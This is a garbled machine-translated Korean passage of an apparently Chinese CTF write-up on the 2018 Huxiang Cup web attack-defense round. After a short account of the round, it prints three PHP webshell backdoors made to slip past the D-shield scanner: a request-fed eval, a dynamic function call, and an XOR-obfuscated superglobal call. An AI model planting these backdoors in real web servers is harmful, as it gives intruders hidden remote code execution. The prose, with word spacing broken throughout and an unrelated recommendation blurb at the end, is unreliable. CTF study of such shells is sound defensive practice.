후 샹 배 2018 WEB AD 중 하나 인 면 살 셸
9893 단어 CTF
올해 후 샹 컵 경기 제 도 는 매우 참신 하 다. 바로 운영 과 제목 은 아직 토로 해 야 한다. 상세 한 것 은 위의 큰 남자 들 의 평가 와 같다. P 멍 신 은 여기 서 웹 의 AD 상황 을 정리 할 수 밖 에 없다.
한 마디 로 장 내 를 다스리다
먼저 올 라 가면 루트 권한 의. shell. php 를 볼 수 있 습 니 다. 반복 적 으로 삭제 해 야 지 울 수 있 을 것 같 지만 이것 은 다시 반복 적 으로 기록 할 것 같 습 니 다.그래서 이 걸 들 고. 셸. php 가 계속 전체 에 요청 하면 돼 요. 몇 번 더 해 봐 요. 삭제 되 었 다가 다시 생 겼 나 봐 요.이것 은 아마도 주최측 이 스스로 웹 사 이 트 를 관리 하려 고 했 는데 지우 지 않 았 습 니까?그리고 flag 를 내 는 곳 이 카드 가 됩 니 다. 저 는 자동 으로 flag 를 내 는 스 크 립 트 를 써 서 상관 하지 않 았 습 니 다. 그 결과 제 가 제출 하지 않 은 적 이 많 고 점 수 를 적 게 받 았 습 니 다.물론 여기 서 80 개 팀 이 두 개의 C 단 으로 나 뉘 었 고
172.16.0.xxx
172.16.1.xxx
우 리 는 1.xxx
만 발견 했다.백 도 어
시합 후에 p0 사내 에 게 가르침 을 청 했 는데 뒷문 이 하나 더 있 는 것 을 발 견 했 습 니 다. 그러나 우 리 는 직접 D 방 패 를 들 고 쓸 었 지만 쓸 지 못 했 습 니 다. 시합 후에 보 니 알 고 보 니:
$a = $_REQUEST['a'];
$b = null;// , ,
eval($b.$a.$b);//$b ,
?>
특이 하 네. D 방패 가 0 바이트 로 잘 렸 나 봐??,배 웠 어, 배 웠 어.예전 에 큰 놈 이 보 낸 if else 가 모니터링 을 돌 면 지금도 D 방패 보 2 급 위협 을 받 을 수 있 습 니 다.
=
$a = $_REQUEST[0];
if (true)
$b = $a;
else
$b = "";
if (true)
$c = $_REQUEST[1];
else
$c = "";
$c($b);
?>
그러나 그런 것 이나 인 코딩 은 D 방패 에 의 해 밝 혀 지지 않 지만 특징 이 너무 뚜렷 해서 수 동 으로 검색
^
하면 됩 니 다. [웃음 울 음]${(chr(63)^chr(96)).(chr(46)^chr(126)).(chr(47)^chr(96)).(chr(46)^chr(125)).(chr(47)^chr(123))}[(chr(43)^chr(64))](${(chr(36)^chr(123)).(chr(46)^chr(126)).(chr(47)^chr(96)).(chr(46)^chr(125)).(chr(47)^chr(123))}[(chr(44)^chr(64))]);
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
Windows10에 Win-Kex(kali-linux)를 도입한다.Windows10에 Win-Kex(kali-linux)를 도입하게 되었으므로, Windows10 wsl에서 우분투를 설치했습니다. (이것에 의해, 만약 wsl를 사용한 적이 없는 사람에게 필요한 설정을 하고 있었을 ...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.